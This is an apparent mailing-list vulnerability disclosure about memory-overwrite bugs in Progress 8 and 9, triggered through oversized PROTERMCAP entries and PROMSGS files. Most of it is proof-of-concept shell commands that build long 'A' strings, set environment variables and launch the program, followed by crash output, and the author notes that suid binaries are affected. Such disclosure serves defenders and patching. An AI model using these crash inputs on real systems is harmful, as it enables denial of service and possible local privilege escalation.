A malformed termcaps and promsgs can overwrite memory on progress
versions 8 and 9 These are two seperate issues but the below examples
show they can be used simultaneously in some cases. These have been
patched to my knowledge however I do not know the patch numbers. Put a
few thousand chars on each line you should be able to crash it most of
the suid executables and plenty of others. Please note these
issues are not related to the other 2 posts released this week. They
were filed
with progress under different issue tickets and were addressed in fixes
seperately.

mal termcap entry:
v7kf|version 7 key functions:\

:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA....
:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA....
:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA....

[rootlinux dlc]# echo "v7kf|version 7 key functions:\\" > term
[rootlinux dlc]# echo :`perl -e 'print "A" x 3000'` >> term
[rootlinux dlc]# echo :`perl -e 'print "A" x 3000'` >> term
[rootlinux dlc]# echo :`perl -e 'print "A" x 3000'` >> term
[rootlinux dlc]# export PROTERMCAP=./term

There are a few ways to set this off... you can make use of a bug in the
PROMSGS
here is the standard promsgs error for a bad term.
PROGRESS Version 9.1C as of Thu Jun 7 10:03:59 EDT 2001
 
Unable to use your terminal. Check your PROTERMCAP file. (443)
** Could not find terminal type xterm in file ./term. (146)

[rootlinux dlc]# perl -e 'print "A" x 9000' > /tmp/promsgs
[rootlinux dlc]# export PROMSGS=/tmp/promsgs

[rootlinux dlc]# bin/pro

                           Progress Software Corporation
                                    14 Oak Park
                            Bedford, Massachusetts 01730
                                    781-280-4000

       PROGRESS is a registered trademark of Progress Software
Corporation
                              Copyright 1984-2001
                        by Progress Software Corporation
                              All Rights Reserved

PROGRESS Version 9.1C as of Thu Jun 7 10:03:59 EDT 2001

Error formatting messaage 96. Message file is corrupt.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
Error formatting messaage 24. Message file is corrupt.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
rrno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
Error formatting messaage 146. Message file is corrupt.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 443
Error formatting messaage 49. Message file is corrupt.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 439
Quit (core dumped)

Heres the normal error when the termcap is wrong.
Unable to use your terminal. Check your PROTERMCAP file. (443)
** The protermcap file must contain :ce. (117)
** The protermcap file must contain :cl. (117)
** The protermcap file must contain :cm. (117)

Now for an example using just the termcap without tampering with
PROMSGS...
[rootlinux dlc]# echo :ce=`perl -e 'print "A" x 3000'` >> term
[rootlinux dlc]# echo :cl=`perl -e 'print "A" x 3000'` >> term
[rootlinux dlc]# echo :cm=`perl -e 'print "A" x 3000'` >> term
[rootlinux dlc]# echo :ce=`perl -e 'print "A" x 9000'` >> term
[rootlinux dlc]# export TERM=v7kf
[rootlinux dlc]# bin/pro

 
        

       

      
     

    

   

  
 
                           Progress Software Corporation
                                    14 Oak Park
                            Bedford, Massachusetts 01730
                                    781-280-4000
 
       PROGRESS is a registered trademark of Progress Software
Corporation
                              Copyright 1984-2001
                        by Progress Software Corporation
                              All Rights Reserved
 
PROGRESS Version 9.1C as of Thu Jun 7 10:03:59 EDT 2001
 
SYSTEM ERROR: strent request for more than 32K. (893)
Quit (core dumped)

It is also possible to crash suids using only the PROMSGS... I have a
patched version at the moment so I can not demonstrate.

-KF

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]